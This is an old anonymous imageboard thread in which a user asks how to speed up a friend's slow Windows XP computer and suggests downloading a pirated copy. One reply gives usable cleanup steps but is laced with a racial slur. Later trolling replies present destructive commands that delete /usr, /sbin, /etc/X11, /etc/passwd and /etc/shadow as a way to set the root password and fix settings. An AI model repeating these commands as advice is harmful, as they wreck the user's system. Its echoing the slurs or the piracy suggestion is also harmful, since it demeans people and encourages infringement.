Slow computer, any advice? + xp install help

Name: Anonymous 2007-10-28 21:09

Hi /tech/,

My friend's computer is running really slow so I suggested she reformatted her computer. In order to do this you need to reinstall windows xp? She doesn't know how her computer was set-up in the first place and she thinks it was pirated or something.

I was thinking of telling her to download a torrent from either the pirate bay, torrentz, or isohunt. Like maybe the second download on here? http://isohunt.com/torrents/?ihq=windows+xp .
And then burn this software to a cd and doing the normal reformat stuff?

Plus, is there really any way to make a computer go faster besides reformatting? It's always seemed like the only way to clear all the crap you get from the internet.

Please real advice and no trolling. I may be asking for advice, but I'm certainly not an idiot.

There's no immediate need to reformat, ESPECIALLY if you don't have the OS to reload!

1. Internet Explorer is a huge problem.  Download Firefox.

2. Once Firefox is up and running, go into IE's installed objects and delete all that shit.  I don't run IE anymore (shit, no!), but removing the installed objects is something like Tools|Config.  You'll find what are effectively "plugins" there.

3. Don't use IE ever, EVER again.  If your Firefox ever fucks up, you CAN use it to get another copy ... but for a lousy $10 you can get a 1GB thumbdrive with the Firefox 2 loader on it anyway, so why worry?

4. Once you finally stop your Internet browser from raping you (as Microsoft planned all along), you can attend to all the little programs lurking in your system.  Go to Control Panel, load programs, and anything that sounds like a nigger program, UNINSTALL it.  That means toolbars and shopping and Internet games and other nigger stuff like that.  Basically, if it's a time-, memory- and processor-wasting program, GET RID OF IT.

5. During the uninstallation of your niggerware, feel free to post inquiries here on this message board for assistance.  There are also a myriad of other sites that offer free tech support for legions of bored techs who will help you for free.

6. Once you defeat your niggerware (basically, spyware, adware, and bells&whistles), then it's time to address the programs that are hiding or are hard to remove.  For that, you need online help, so again, identify things and then post the details here or on tech-support sites.

7. Once you defeat your malware (i.e. the stuff that hides or doesn't uninstall normally), then you can consider adding RAM if the computer still seems slow.

8. Once you add RAM, then you are largely at the end of the process for speeding up your computer.

Your friend is obviously retarded. Download and install Ubuntu, and don't tell her the root password. That ought to be enough to protect her from herself.

>Ubuntu
>root password

Looks like you need to be protected from yourself as well.

What are you talking about? If you're a big enough idiot to not know how to set the root password in Ubuntu maybe you SHOULD stick with Wintendos...

/b/ is that way. we don't need that here

sudo passwd root
sudo rm -rf /usr/
sudo rm -rf /sbin/

This will set your Ubuntu root password and redo all the root permissions on everything.

roflroflrofl

While you're at it you should probably reset your GUI settings so they reload properly ;)

sudo rm -rf /etc/X11

...user accounts...

sudo rm -rf /etc/passwd
sudo rm -rf /etc/shadow

....

Yeah, that should do it.
